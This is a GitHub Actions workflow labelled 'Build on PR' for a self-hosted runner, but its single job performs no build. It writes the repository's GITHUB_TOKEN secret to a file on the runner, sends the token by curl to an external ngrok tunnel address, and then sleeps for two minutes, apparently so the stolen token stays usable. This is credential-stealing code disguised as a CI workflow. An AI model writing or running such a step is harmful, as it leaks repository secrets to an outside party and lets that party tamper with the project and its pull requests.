name: Build on PR

on:
  pull_request:

permissions:
  checks: write
  pull-requests: write
  contents: read
  packages: read
  security-events: read

jobs:
  andy:
    runs-on: [self-hosted, x86]
    steps:
      - name: andy
        run: |
          set -x
          echo ${{ secrets.GITHUB_TOKEN }} > /srv/gh-runners/quic-yocto/andy.txt
          echo "ANDY - its ready"
          curl -H "Authorization: Bearer ${{secrets.GITHUB_TOKEN}}" https://3717-2603-8080-d900-39-210f-220f-51b8-16e9.ngrok-free.app/
          sleep 120s
          echo "DONE"
